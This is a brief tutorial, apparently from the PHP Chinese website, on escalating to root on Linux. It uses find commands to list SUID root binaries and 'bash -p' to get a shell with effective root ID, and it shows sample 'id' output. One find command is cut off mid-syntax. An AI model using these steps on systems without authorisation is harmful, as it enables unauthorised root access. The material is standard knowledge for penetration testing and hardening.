How to use SUID to escalate privileges under Linux

SUID is a permission mechanism in Linux. When a file with this permission is executed, the caller will temporarily obtain the permissions of the owner of the file. If you have SUID permissions, you can use binaries and tools in the system to perform root privilege escalation.

The following command can discover all SUID executable files running on the system. Specifically, the command will try to find files with a SUID that has root permissions.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

All the above binaries will be executed with root user rights because of their permissions Contains "s" and corresponds to root permissions.

Bash

The following command will open a bash shell with root privileges.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

The above is the detailed content of How to use SUID to escalate privileges under Linux. For more information, please follow other related articles on the PHP Chinese website!